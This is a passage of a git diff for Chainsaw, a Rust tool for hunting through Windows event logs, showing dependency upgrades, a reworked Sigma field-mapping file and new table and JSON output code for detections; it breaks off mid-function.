-1199,23 +1046,23 @@ dependencies = [ [[package]] name = "serde_json" -version = "1.0.67" +version = "1.0.81" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a7f9e390c27c3c0ce8bc5d725f6e4d30a29d26659494aa4b17535f7522c5c950" +checksum = "9b7ce2b32a1aed03c558dc61a5cd328f15aff2dbc17daad8fb8af04d2100e15c" dependencies = [ - "itoa", + "itoa 1.0.2", "ryu", "serde", ] [[package]] name = "serde_yaml" -version = "0.8.20" +version = "0.8.24" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ad104641f3c958dab30eb3010e834c2622d1f3f4c530fef1dee20ad9485f3c09" +checksum = "707d15895415db6628332b737c838b88c598522e4dc70647e59b72312924aebc" dependencies = [ - "dtoa", "indexmap", + "ryu", "serde", "yaml-rust", ] @@ -1253,9 +1100,9 @@ dependencies = [ [[package]] name = "skeptic" -version = "0.13.6" +version = "0.13.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "188b810342d98f23f0bb875045299f34187b559370b041eb11520c905370a888" +checksum = "16d23b015676c90a0f01c197bfdc786c20342c73a0afdda9025adb0bc42940a8" dependencies = [ "bytecount", "cargo_metadata", @@ -1268,9 +1115,9 @@ dependencies = [ [[package]] name = "smallvec" -version = "1.6.1" +version = "1.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fe0f37c9e8f3c5a4a66ad655a93c74daac4ad00c441533bf5c6e7990bb42604e" +checksum = "f2dd574626839106c320a323308629dcb1acfc96e32a8cba364ddc61ac23ee83" [[package]] name = "strsim" @@ -1280,9 +1127,9 @@ checksum = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a" [[package]] name = "structopt" -version = "0.3.23" +version = "0.3.26" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bf9d950ef167e25e0bdb073cf1d68e9ad2795ac826f2f3f59647817cf23c0bfa" +checksum = "0c6b5c64445ba8094a6ab0c3cd2ad323e07171012d9c98b0b15651daf1787a10" dependencies = [ "clap", "lazy_static", @@ -1291,9 +1138,9 @@ dependencies = [ [[package]] name = "structopt-derive" -version = "0.4.16" +version = "0.4.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "134d838a2c9943ac3125cf6df165eda53493451b719f3255b2a26b85f772d0ba" +checksum = "dcb5ae327f9cc13b68763b5749770cb9e048a99bd9dfdfa58d0cf05d5f64afe0" dependencies = [ "heck", "proc-macro-error", @@ -1304,35 +1151,24 @@ dependencies = [ [[package]] name = "syn" -version = "1.0.76" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c6f107db402c2c2055242dbf4d2af0e69197202e9faacbef9571bbe47f5a1b84" -dependencies = [ - "proc-macro2", - "quote", - "unicode-xid", -] - -[[package]] -name = "synstructure" -version = "0.12.5" +version = "1.0.95" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "474aaa926faa1603c40b7885a9eaea29b444d1cb2850cb7c0e37bb1a4182f4fa" +checksum = "fbaf6116ab8924f39d52792136fb74fd60a80194cf1b1c6ffa6453eef1c3f942" dependencies = [ "proc-macro2", "quote", - "syn", - "unicode-xid", + "unicode-ident", ] [[package]] name = "tau-engine" -version = "1.0.2" +version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "03d4076a31ff10d9f07ff47a897ba1886eadeb85e89e4f7310c34d090e10a86d" +checksum = "e01789704e01baf9d6b0e677648e6bf52b7ba7192c9201dd426f02ab6d493f9f" dependencies = [ - "aho-corasick", - "regex", + "aho-corasick 0.7.18", + "lazy_static", + "regex 1.5.6", "serde", "serde_json", "serde_yaml", @@ -1341,14 +1177,14 @@ dependencies = [ [[package]] name = "tempfile" -version = "3.2.0" +version = "3.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dac1c663cfc93810f88aed9b8941d48cabf856a1b111c29a40439018d870eb22" +checksum = "5cdb1ef4eaeeaddc8fbd371e5017057064af0911902ef36b39801f67cc6d79e4" dependencies = [ "cfg-if", + "fastrand", "libc", - "rand", - "redox_syscall 0.2.10", + "redox_syscall 0.2.13", "remove_dir_all", "winapi", ] @@ -1366,9 +1202,9 @@ dependencies = [ [[package]] name = "termcolor" -version = "1.1.2" +version = "1.1.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4" +checksum = "bab24d30b911b2376f3a13cc2cd443142f0c81dda04c118693e35b3835757755" dependencies = [ "winapi-util", ] @@ -1394,39 +1230,49 @@ dependencies = [ [[package]] name = "thiserror" -version = "1.0.29" +version = "1.0.31" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "602eca064b2d83369e2b2f34b09c70b605402801927c65c11071ac911d299b88" +checksum = "bd829fe32373d27f76265620b5309d0340cb8550f523c1dda251d6298069069a" dependencies = [ "thiserror-impl", ] [[package]] name = "thiserror-impl" -version = "1.0.29" +version = "1.0.31" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bad553cc2c78e8de258400763a647e80e6d1b31ee237275d756f6836d204494c" +checksum = "0396bc89e626244658bef819e22d0cc459e795a5ebe878e6ec336d1674a8d79a" dependencies = [ "proc-macro2", "quote", "syn", ] +[[package]] +name = "thread_local" +version = "0.3.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c6b53e329000edc2b34dbe8545fd20e55a333362d0a321909685a19bd28c3f1b" +dependencies = [ + "lazy_static", +] + [[package]] name = "time" -version = "0.1.43" +version = "0.1.44" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ca8a50ef2360fbd1eeb0ecd46795a87a19024eb4b53c5dc916ca1fd95fe62438" +checksum = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" dependencies = [ "libc", + "wasi 0.10.0+wasi-snapshot-preview1", "winapi", ] [[package]] name = "tracing" -version = "0.1.26" +version = "0.1.34" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "09adeb8c97449311ccd28a427f96fb563e7fd31aabf994189879d9da2394b89d" +checksum = "5d0ecdcb44a79f0fe9844f0c4f33a342cbcbb5117de8001e6ba0dc2351327d09" dependencies = [ "cfg-if", "pin-project-lite", @@ -1436,9 +1282,9 @@ dependencies = [ [[package]] name = "tracing-attributes" -version = "0.1.15" +version = "0.1.21" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c42e6fa53307c8a17e4ccd4dc81cf5ec38db9209f59b222210375b54ee40d1e2" +checksum = "cc6b8ad3567499f98a1db7a752b07a7c8c7c7c34c332ec00effb2b0027974b7c" dependencies = [ "proc-macro2", "quote", @@ -1447,18 +1293,18 @@ dependencies = [ [[package]] name = "tracing-core" -version = "0.1.19" +version = "0.1.26" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2ca517f43f0fb96e0c3072ed5c275fe5eece87e8cb52f4a77b69226d3b1c9df8" +checksum = "f54c8ca710e81886d498c2fd3331b56c93aa248d49de2222ad2742247c60072f" dependencies = [ "lazy_static", ] [[package]] -name = "ucd-trie" -version = "0.1.3" +name = "ucd-util" +version = "0.1.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "56dee185309b50d1f11bfedef0fe6d036842e3fb77413abef29f8f8d1c5d4c1c" +checksum = "c85f514e095d348c279b1e5cd76795082cf15bd59b93207832abe0b1d8fed236" [[package]] name = "unicase" @@ -1470,28 +1316,28 @@ dependencies = [ ] [[package]] -name = "unicode-segmentation" -version = "1.8.0" +name = "unicode-ident" +version = "1.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8895849a949e7845e06bd6dc1aa51731a103c42707010a5b591c0038fb73385b" +checksum = "d22af068fba1eb5edcb4aea19d382b2a3deb4c8f9d475c589b6ada9e0fd493ee" [[package]] -name = "unicode-width" -version = "0.1.8" +name = "unicode-segmentation" +version = "1.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3" +checksum = "7e8820f5d777f6224dc4be3632222971ac30164d4a258d595640799554ebfd99" [[package]] -name = "unicode-xid" -version = "0.2.2" +name = "unicode-width" +version = "0.1.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8ccb82d61f80a663efe1f787a51b16b5a51e3314d6ac365b08639f52387b33f3" +checksum = "3ed742d4ea2bd1176e236172c8429aaf54486e7ac098db29ffe6529e0ce50973" [[package]] -name = "unindent" -version = "0.1.7" +name = "utf8-ranges" +version = "1.0.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f14ee04d9415b52b3aeab06258a3f07093182b88ba0f9b8d203f211a7a7d41c7" +checksum = "7fcfc827f90e53a02eaef5e535ee14266c1d569214c6aa70133a624d8a3164ba" [[package]] name = "vec_map" @@ -1501,9 +1347,9 @@ checksum = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191" [[package]] name = "version_check" -version = "0.9.3" +version = "0.9.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5fecdca9a5291cc2b8dcf7dc02453fee791a280f3743cb0905f8822ae463b3fe" +checksum = "49874b5167b65d7193b8aba1567f5c7d93d001cafc34600cee003eda787e483f" [[package]] name = "walkdir" @@ -1524,9 +1370,9 @@ checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" [[package]] name = "wasi" -version = "0.10.2+wasi-snapshot-preview1" +version = "0.10.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fd6fbd9a79829dd1ad0cc20627bf1ed606756a7f77edff7b66b7064f9cb327c6" +checksum = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" [[package]] name = "winapi" @@ -1568,7 +1414,7 @@ dependencies = [ "bitflags", "byteorder", "chrono", - "env_logger 0.7.1", + "env_logger", "log", "num-derive", "num-traits", @@ -1588,6 +1434,6 @@ dependencies = [ [[package]] name = "zeroize" -version = "1.4.1" +version = "1.5.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "377db0846015f7ae377174787dd452e1c5f5a9050bc6f954911d01f116daa0cd" +checksum = "94693807d016b2f2d2e14420eb3bfcca689311ff775dcf113d74ea624b7cdf07" diff --git a/Cargo.toml b/Cargo.toml index 1f23247b..5fdc826b 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,38 +1,30 @@ [package] name = "chainsaw" -version = "1.1.7" +version = "2.0.0-alpha.0" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" authors = ["James Dorgan ","Alex Kornitzer "] readme = "README.md" license = "GPL3" -edition = "2018" +edition = "2021" [dependencies] -ajson = "0.2" +aho-corasick = "0.7" anyhow = "1.0" chrono = "0.4" +chrono-tz = { version = "0.4", features = ["serde"] } colour = "0.6" -csv = "1.1" -env_logger = "0.6" evtx = "0.7" -failure = "0.1" -glob = "0.3" indicatif = "0.16" -is_elevated = "0.1.2" -itertools = "0.10" -log = "0.4" -prettytable-rs = "0.7" +prettytable-rs = "0.8" rayon = "1.5" -regex = "1.4" -serde = { version = "=1.0.117", features = ["derive"]} -serde_derive = "1.0" +regex = "1.5" +serde = { version = "1.0", features = ["derive"] } serde_json = "1.0" serde_yaml = "0.8" structopt = "0.3" -tau-engine = { version = "1.0", features = ["json"] } -walkdir = "2.3" +tau-engine = { version = "1.0", features = ["core", "json"] } [dev-dependencies] diff --git a/evtx_attack_samples b/evtx_attack_samples deleted file mode 160000 index b947ed80..00000000 --- a/evtx_attack_samples +++ /dev/null @@ -1 +0,0 @@ -Subproject commit b947ed80cd67a7413f6689d032eb1151f85f9df6 diff --git a/mapping_files/sigma-mapping.yml b/mapping_files/sigma-mapping.yml deleted file mode 100644 index 1ff7b100..00000000 --- a/mapping_files/sigma-mapping.yml +++ /dev/null @@ -1,110 +0,0 @@ -# Supported values are Stalker and Sigma -kind: sigma -# Exclude noisy rules, add the "title" of the Sigma rule here to exclude (or just delete the rule...) -exclusions: - - "Wuauclt Network Connection" - - "Exports Registry Key To an Alternate Data Stream" - - "NetNTLM Downgrade Attack" - - "Non Interactive PowerShell" - - "Defense evasion via process reimaging" -# EventID and SystemTime are automatically added to the mapping schema and show in the table output -mappings: - 1: - title: "Suspicious Process Creation" - provider: "Microsoft-Windows-Sysmon" - search_fields: - Image: "Event.EventData.Image" - CommandLine: "Event.EventData.CommandLine" - ParentImage: "Event.EventData.ParentImage" - ParentCommandLine: "Event.EventData.ParentCommandLine" - OriginalFileName: "Event.EventData.OriginalFileName" - table_headers: - context_field: "Event.EventData.Image" - command_line: "Event.EventData.CommandLine" - - # Can cause noise, enabled as needed - # 3: - # title: "Suspicious Network Connection" - # provider: "Microsoft-Windows-Sysmon" - # search_fields: - # Image: "Event.EventData.Image" - # DestinationIp: "Event.EventData.DestinationIp" - # DestinationHostname: "Event.EventData.DestinationHostname" - # DestinationPort: "Event.EventData.DestinationPort" - # DestinationIsIpv6: "Event.EventData.DestinationIsIpv6" - # User: "Event.EventData.User" - # Initiated: "Event.EventData.Initiated" - # SourcePort: "Event.EventData.SourcePort" - # table_headers: - # context_field: "Event.EventData.Image" - # destination_ip: "Event.EventData.DestinationIp" - # destination_port: "Event.EventData.DestinationPort" - - 7: - title: "Suspicious Image Load" - provider: "Microsoft-Windows-Sysmon" - search_fields: - Image: "Event.EventData.Image" - ImageLoaded: "Event.EventData.ImageLoaded" - table_headers: - context_field: "Event.EventData.Image" - image_loaded: "Event.EventData.ImageLoaded" - - 11: - title: "Suspicious File Creation" - provider: "Microsoft-Windows-Sysmon" - search_fields: - Image: "Event.EventData.Image" - TargetFilename: "Event.EventData.TargetFilename" - table_headers: - context_field: "Event.EventData.TargetFilename" - image: "Event.EventData.Image" - - 13: - title: "Suspicious Registry Event" - provider: "Microsoft-Windows-Sysmon" - search_fields: - Image: "Event.EventData.Image" - TargetObject: "Event.EventData.TargetObject" - Details: "Event.EventData.Details" - table_headers: - context_field: "Event.EventData.Details" - target_object: "Event.EventData.TargetObject" - - 7045: - title: "Suspicious Service Installed" - provider: "Service Control Manager" - search_fields: - CommandLine: "Event.EventData.ImagePath" - ServiceName: "Event.EventData.ServiceName" - table_headers: - context_field: "Event.EventData.ImagePath" - service_name: "Event.EventData.ServiceName" - - 4688: - title: "Suspicious Command Line" - provider: "Microsoft-Windows-Security-Auditing" - search_fields: - CommandLine: "Event.EventData.CommandLine" - UserName: "Event.EventData.SubjectUserName" - Image: "Event.EventData.NewProcessName" - table_headers: - context_field: "Event.EventData.CommandLine" - process_name: "Event.EventData.NewProcessName" - - 4104: - title: "Suspicious Powershell ScriptBlock" - provider: "Microsoft-Windows-PowerShell" - search_fields: - ScriptBlockText: "Event.EventData.ScriptBlockText" - table_headers: - context_field: "Event.EventData.ScriptBlockText" - - 4698: - title: "Suspicious Scheduled Task Created" - provider: "Microsoft-Windows-Security-Auditing" - search_fields: - CommandLine: "Event.EventData.TaskContent" - table_headers: - context_field: "Event.EventData.TaskContent" - username: "Event.EventData.SubjectUserName" diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml new file mode 100644 index 00000000..a33db3b4 --- /dev/null +++ b/mappings/sigma-event-logs.yml @@ -0,0 +1,166 @@ +--- +name: Chainsaw's Sigma mappings for Event Logs +kind: evtx +rules: sigma + +ignore: + - Defense evasion via process reimaging + - Exports Registry Key To an Alternate Data Stream + - NetNTLM Downgrade Attack + - Non Interactive PowerShell + - Wuauclt Network Connection + +groups: + - name: Suspicious Process Creation + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 1 + Event.System.Provider: Microsoft-Windows-Sysmon + fields: + CommandLine: Event.EventData.CommandLine + Computer: Event.System.Computer + EventID: Event.System.EventID + Image: Event.EventData.Image + OriginalFileName: Event.EventData.OriginalFileName + ParentCommandLine: Event.EventData.ParentCommandLine + ParentImage: Event.EventData.ParentImage + default: + - EventID + - Computer + - Image + - CommandLine + + - name: Suspicious Network Connection + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 3 + Event.System.Provider: Microsoft-Windows-Sysmon + fields: + Computer: Event.System.Computer + DestinationIp: Event.EventData.DestinationIp + DestinationHostname: Event.EventData.DestinationHostname + DestinationPort: Event.EventData.DestinationPort + DestinationIsIpv6: Event.EventData.DestinationIsIpv6 + EventID: Event.System.EventID + Image: Event.EventData.Image + Initiated: Event.EventData.Initiated + SourcePort: Event.EventData.SourcePort + User: Event.EventData.User + default: + - EventID + - Computer + - Image + - DestinationIp + - DestinationPort + + - name: Suspicious Image Load + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 7 + Event.System.Provider: Microsoft-Windows-Sysmon + fields: + Computer: Event.System.Computer + EventID: Event.System.EventID + Image: Event.EventData.Image + ImageLoaded: Event.EventData.ImageLoaded + default: + - EventID + - Computer + - Image + - ImageLoaded + + - name: Suspicious File Creation + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 11 + Event.System.Provider: Microsoft-Windows-Sysmon + fields: + Computer: Event.System.Computer + EventID: Event.System.EventID + Image: Event.EventData.Image + TargetFilename: Event.EventData.TargetFilename + default: + - EventID + - Computer + - TargetFilename + - Image + + - name: Suspicious Registry Event + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 13 + Event.System.Provider: Microsoft-Windows-Sysmon + fields: + Computer: Event.System.Computer + Details: Event.EventData.Details + EventID: Event.System.EventID + Image: Event.EventData.Image + TargetObject: Event.EventData.TargetObject + default: + - EventID + - Computer + - Details + - TargetObject + + - name: Suspicious Service Installed + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 7045 + Event.System.Provider: Service Control Manager + fields: + CommandLine: Event.EventData.ImagePath + Computer: Event.System.Computer + EventID: Event.System.EventID + ServiceName: Event.EventData.ServiceName + default: + - EventID + - Computer + - CommandLine + - ServiceName + + - name: Suspicious Command Line + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 4688 + Event.System.Provider: Microsoft-Windows-Security-Auditing + fields: + CommandLine: Event.EventData.CommandLine + Computer: Event.System.Computer + EventID: Event.System.EventID + Image: Event.EventData.NewProcessName + UserName: Event.EventData.SubjectUserName + default: + - EventID + - Computer + - CommandLine + - Image + + - name: Suspicious Powershell ScriptBlock + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 4104 + Event.System.Provider: Microsoft-Windows-PowerShell + fields: + Computer: Event.System.Computer + EventID: Event.System.EventID + ScriptBlockText: Event.EventData.ScriptBlockText + default: + - EventID + - Computer + - ScriptBlockText + + - name: Suspicious Scheduled Task Created + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 4698 + Event.System.Provider: Microsoft-Windows-Security-Auditing + fields: + CommandLine: Event.EventData.TaskContent + Computer: Event.System.Computer + EventID: Event.System.EventID + UserName: Event.EventData.SubjectUserName + default: + - EventID + - Computer + - CommandLine + - UserName diff --git a/sigma_rules b/sigma_rules deleted file mode 160000 index 5b72cdb3..00000000 --- a/sigma_rules +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 5b72cdb3c2df8ccb82e5bdd5e995f38ff8d6acad diff --git a/src/check.rs b/src/check.rs deleted file mode 100644 index 5bf841a6..00000000 --- a/src/check.rs +++ /dev/null @@ -1,36 +0,0 @@ -use crate::hunt::{get_mapping_file, load_detection_rules, RuleType}; -use anyhow::Result; -use std::path::PathBuf; -use structopt::StructOpt; - -#[derive(StructOpt)] -pub struct CheckOpts { - /// Specify a directory containing detection rules to use. All files matching *.yml will be used. - rules_path: PathBuf, - - /// Specify the mapping file to use to with the specified detection rules. - /// Required when using the --rule/-r flag - #[structopt(short = "m", long = "mapping")] - pub mapping_path: PathBuf, - - /// Print verbose - #[structopt(short = "v", long = "verbose")] - pub verbose: bool, -} - -pub fn run_check(opt: CheckOpts) -> Result { - let mapping_file = get_mapping_file(&opt.mapping_path)?; - match RuleType::from(&mapping_file.kind) { - Some(RuleType::Sigma) => {} - Some(RuleType::Stalker) => {} - None => { - return Err(anyhow!( - "Unsupported rule kind: {} - supported values are 'sigma' or 'stalker'", - mapping_file.kind - )) - } - } - cs_eprintln!("[+] Validating supplied detection rules...\n\r"); - load_detection_rules(&opt.rules_path, true, &mapping_file, opt.verbose)?; - Ok("".to_string()) -} diff --git a/src/cli.rs b/src/cli.rs new file mode 100644 index 00000000..1315bd49 --- /dev/null +++ b/src/cli.rs @@ -0,0 +1,266 @@ +use std::collections::HashMap; + +use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; +use chrono_tz::Tz; +use indicatif::{ProgressBar, ProgressDrawTarget, ProgressStyle}; +use prettytable::{cell, format, Row, Table}; +use tau_engine::Document; + +use crate::hunt::{Detection, Detections, Kind, Mapping}; +use crate::rule::Rule; + +#[cfg(not(windows))] +pub const RULE_PREFIX: &str = "‣"; + +#[cfg(windows)] +pub const RULE_PREFIX: &str = "+"; + +#[cfg(not(windows))] +const TICK_SETTINGS: (&str, u64) = ("⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏ ", 80); + +#[cfg(windows)] +const TICK_SETTINGS: (&str, u64) = (r"-\|/-", 200); + +pub fn init_progress_bar(size: u64, msg: String) -> indicatif::ProgressBar { + let pb = ProgressBar::new(size); + unsafe { + match crate::write::WRITER.quiet { + true => pb.set_draw_target(ProgressDrawTarget::hidden()), + false => pb.set_draw_target(ProgressDrawTarget::stderr()), + } + }; + pb.set_style( + ProgressStyle::default_bar() + .template("[+] {msg}: [{bar:40}] {pos}/{len} {spinner}") + .tick_chars(TICK_SETTINGS.0) + .progress_chars("=>-"), + ); + + pb.set_message(msg); + pb.enable_steady_tick(TICK_SETTINGS.1); + pb +} + +pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String { + // Take the context_field and format it for printing. Remove newlines, break into even chunks etc. + // If this is a scheduled task we need to parse the XML to make it more readable + let mut data = data + .replace("\n", "") + .replace("\r", "") + .replace("\t", "") + .replace(" ", " ") + .chars() + .collect::>() + .chunks(length as usize) + .map(|c| c.iter().collect::()) + .collect::>() + .join("\n"); + + let truncate_len = 1000; + + if !full_output && data.len() > truncate_len { + data.truncate(truncate_len); + data.push_str("...\n\n(use --full to show all content)"); + } + + data +} + +pub fn print_detections( + detections: &[Detections], + mappings: &[Mapping], + rules: &[Rule], + column_width: u32, + full: bool, + local: bool, + metadata: bool, + timezone: Option, +) { + let format = format::FormatBuilder::new() + .column_separator('│') + .borders('│') + .separators( + &[format::LinePosition::Top], + format::LineSeparator::new('─', '┬', '┌', '┐'), + ) + .separators( + &[format::LinePosition::Intern], + format::LineSeparator::new('─', '┼', '├', '┤'), + ) + .separators( + &[format::LinePosition::Bottom], + format::LineSeparator::new('─', '┴', '└', '┘'), + ) + .padding(1, 1) + .build(); + + let mappings: HashMap<_, HashMap<_, _>> = mappings + .iter() + .map(|m| (&m.name, m.groups.iter().map(|g| (&g.name, g)).collect())) + .collect(); + let rules: HashMap<_, _> = rules.iter().map(|r| (&r.tag, r)).collect(); + + // Do a signle unfold... + let mut grouped: HashMap< + (&Option, &String), + Vec<(&NaiveDateTime, &Kind, Vec<&String>)>, + > = HashMap::new(); + for detection in detections { + let mut tags: HashMap<(&Option, &String), (&NaiveDateTime, Vec<&String>)> = + HashMap::new(); + for hit in &detection.hits { + let tags = tags + .entry((&hit.mapping, &hit.group)) + .or_insert((&hit.timestamp, vec![])); + (*tags).1.push(&hit.tag); + } + for (k, v) in tags { + let grouped = grouped.entry(k).or_insert(vec![]); + (*grouped).push((&v.0, &detection.kind, v.1)); + } + } + + let mut keys = grouped.keys().cloned().collect::>(); + keys.sort(); + for key in keys { + let mut grouped = grouped.remove(&key).expect("could not get grouped!"); + grouped.sort_by(|x, y| x.0.cmp(&y.0)); + let mut table = Table::new(); + table.set_format(format); + let (mapping, group) = key; + if let Some(mapping) = mapping { + if let Some(groups) = mappings.get(mapping) { + let group = groups.get(&group).expect("could not get group!"); + let mut header = vec![ + cell!("timestamp").style_spec("c"), + cell!("detections").style_spec("c"), + ]; + if let Some(default) = group.default.as_ref() { + for field in default { + header.push(cell!(field).style_spec("c")); + } + } else { + header.push(cell!("data").style_spec("c")); + } + table.add_row(Row::new(header)); + for (timestamp, kind, mut tags) in grouped { + tags.sort(); + let localised = if let Some(timezone) = timezone { + timezone + .from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else if local { + Utc.from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else { + DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() + }; + let mut cells = vec![cell!(localised)]; + if metadata { + let mut table = Table::new(); + table.add_row(Row::new(vec![ + cell!("name").style_spec("c"), + cell!("authors").style_spec("c"), + cell!("level").style_spec("c"), + cell!("status").style_spec("c"), + ])); + for tag in tags { + let rule = rules.get(&tag).expect("could not get rule"); + table.add_row(Row::new(vec![ + cell!(tag), + cell!(rule.authors.join("\n")), + cell!(rule.level), + cell!(rule.status), + ])); + } + cells.push(cell!(table)); + } else { + cells.push(cell!(tags + .iter() + .map(|tag| format!("{} {}", RULE_PREFIX, tag.as_str())) + .collect::>() + .join("\n"))); + } + let document = match kind { + Kind::Individual { document } => document, + _ => continue, + }; + if let Some(default) = group.default.as_ref() { + for field in default { + if let Some(value) = group + .fields + .get(field) + .and_then(|k| document.data.find(k)) + .and_then(|v| v.to_string()) + { + cells.push(cell!(format_field_length(&value, full, column_width))); + } else { + cells.push(cell!("")); + } + } + } else { + let json = serde_json::to_string(&document.data) + .expect("could not serialise document"); + cells.push(cell!(format_field_length(&json, false, column_width))); + } + table.add_row(Row::new(cells)); + } + } + } + cs_greenln!("\n[+] Group: {}", key.1); + cs_print_table!(table); + } +} + +pub fn print_json( + detections: &[Detections], + rules: &[Rule], + local: bool, + timezone: Option, +) -> crate::Result<()> { + // TODO: Fixme... + let ruleset = "sigma".to_owned(); + let rules: HashMap<_, _> = rules.iter().map(|r| (&r.tag, r)).collect(); + let mut detections = detections + .iter() + .map(|d| { + let mut detections = Vec::with_capacity(d.hits.len()); + for hit in &d.hits { + let rule = rules.get(&hit.tag).expect("could not get rule!"); + let localised = if let Some(timezone) = timezone { + timezone + .from_local_datetime(&hit.timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else if local { + Utc.from_local_datetime(&hit.timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else { + DateTime::::from_utc(hit.timestamp.clone(), Utc).to_rfc3339() + }; + detections.push(Detection { + authors: &rule.authors, + group: &hit.group, + kind: &d.kind, + level: &rule.level, + name: &hit.tag, + source: &ruleset, + status: &rule.status, + timestamp: localised, + }) + } + detections + }) + .flatten() + .collect::>(); + detections.sort_by(|x, y| x.timestamp.cmp(&y.timestamp)); + cs_print_json!(&detections)?; + Ok(()) +} diff --git a/src/convert/mod.rs b/src/convert/mod.rs deleted file mode 100644 index 6d68cdbe..00000000 --- a/src/convert/mod.rs +++ /dev/null @@ -1,2 +0,0 @@ -pub mod sigma; -pub mod stalker; diff --git a/src/convert/stalker.rs b/src/convert/stalker.rs deleted file mode 100644 index 4a865b9f..00000000 --- a/src/convert/stalker.rs +++ /dev/null @@ -1,35 +0,0 @@ -use crate::hunt::ChainsawRule; -use anyhow::Result; -use std::fs::File; -use std::io::Read; -use std::path::Path; - -#[derive(Clone, Deserialize)] -pub struct Stalker { - tag: String, - tau: tau_engine::Rule, - level: String, - status: String, - authors: Vec, -} - -impl From for ChainsawRule { - fn from(stalker: Stalker) -> Self { - Self { - tag: stalker.tag, - level: Some(stalker.level), - status: Some(stalker.status), - logic: stalker.tau, - authors: Some(stalker.authors), - } - } -} - -pub fn load(rule: &Path) -> Result { - let mut file = File::open(rule)?; - let mut contents = String::new(); - file.read_to_string(&mut contents)?; - - let stalker: Stalker = serde_yaml::from_str(&contents)?; - Ok(ChainsawRule::from(stalker)) -} diff --git a/src/ext/mod.rs b/src/ext/mod.rs new file mode 100644 index 00000000..6a08025e --- /dev/null +++ b/src/ext/mod.rs @@ -0,0 +1 @@ +pub mod tau; diff --git a/src/ext/tau.rs b/src/ext/tau.rs new file mode 100644 index 00000000..84c6cf88 --- /dev/null +++ b/src/ext/tau.rs @@ -0,0 +1,129 @@ +use aho_corasick::AhoCorasickBuilder; +use tau_engine::core::parser::{BoolSym, Expression, IdentifierParser, MatchType, Pattern, Search}; + +pub fn parse_kv(kv: &str) -> crate::Result { + let mut parts = kv.split(": "); + let key = parts.next().expect("invalid tau key value pair"); + let value = parts.next().expect("invalid tau key value pair"); + // NOTE: This is pinched from tau-engine as it is not exposed. + let identifier = value.to_owned().into_identifier()?; + let expression = match identifier.pattern { + Pattern::Equal(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::Equal, + Box::new(Expression::Integer(i)), + ), + Pattern::GreaterThan(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::GreaterThan, + Box::new(Expression::Integer(i)), + ), + Pattern::GreaterThanOrEqual(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::GreaterThanOrEqual, + Box::new(Expression::Integer(i)), + ), + Pattern::LessThan(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::LessThan, + Box::new(Expression::Integer(i)), + ), + Pattern::LessThanOrEqual(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::LessThanOrEqual, + Box::new(Expression::Integer(i)), + ), + Pattern::FEqual(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::Equal, + Box::new(Expression::Float(i)), + ), + 